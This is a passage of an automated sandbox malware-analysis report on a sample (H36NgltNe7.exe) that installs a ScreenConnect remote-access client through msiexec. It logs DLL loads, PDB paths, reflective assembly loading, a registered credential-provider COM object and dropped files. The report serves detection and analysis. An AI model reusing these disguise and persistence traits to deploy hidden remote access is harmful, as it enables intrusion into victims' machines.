                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: H36NgltNe7.exeStatic PE information: certificate valid
                              Source: H36NgltNe7.exeStatic file information: File size 5809056 > 1048576
                              Source: H36NgltNe7.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x537600
                              Source: H36NgltNe7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: H36NgltNe7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: H36NgltNe7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: H36NgltNe7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: H36NgltNe7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: H36NgltNe7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: H36NgltNe7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: H36NgltNe7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597203174.0000000001262000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597069748.0000000001220000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: H36NgltNe7.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1530796871.000000000088D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: H36NgltNe7.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: H36NgltNe7.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: H36NgltNe7.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: H36NgltNe7.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: H36NgltNe7.exe, 6f527a.rbs.3.dr, 6f5279.msi.3.dr, 6f527b.msi.3.dr, MSI576D.tmp.3.dr, MSI5509.tmp.3.dr, MSI5529.tmp.3.dr, setup.msi.0.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: H36NgltNe7.exe, 6f5279.msi.3.dr, 6f527b.msi.3.dr, MSI4C3F.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1596802211.00000000011E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597203174.0000000001262000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597069748.0000000001220000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: H36NgltNe7.exe
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: H36NgltNe7.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: H36NgltNe7.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: H36NgltNe7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: H36NgltNe7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: H36NgltNe7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: H36NgltNe7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: H36NgltNe7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.2.H36NgltNe7.exe.2860000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.H36NgltNe7.exe.babcf4.4.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: H36NgltNe7.exeStatic PE information: real checksum: 0x550b20 should be: 0x591f68
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeCode function: 0_2_00FD1817 push esp; ret 0_2_00FD1821
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeCode function: 0_2_00FD3E63 push edx; retf 0_2_00FD3E75
                              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_04DF77E2 push esp; ret 5_3_04DF77E9
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_014E7752 push 8403C4CFh; iretd 8_2_014E7759
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_014E7732 push eax; iretd 8_2_014E7739
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_03DB6B35 push esp; iretd 8_2_03DB6B39
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_03DB1DA8 push esp; retf 8_2_03DB1DB5
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_052CBAC0 push eax; retf 8_2_052CBAC1
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_058A3F61 pushad ; ret 8_2_058A3F73
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB4ACF10AB push es; iretd 9_2_00007FFB4ACF10B0
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB4ACF8ECC push cs; iretd 9_2_00007FFB4ACF8ECD
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFB4ACF761F push edi; iretd 9_2_00007FFB4ACF7620
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4AD01F00 pushad ; iretd 10_2_00007FFB4AD01F01
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4AD00C39 push esi; iretd 10_2_00007FFB4AD00C3A
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4AD00C27 push ebp; iretd 10_2_00007FFB4AD00C2A
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4AD00BFB push ebx; iretd 10_2_00007FFB4AD00C02

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-a44d-4392d823459f}\inprocserver32
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI576D.tmpJump to dropped file
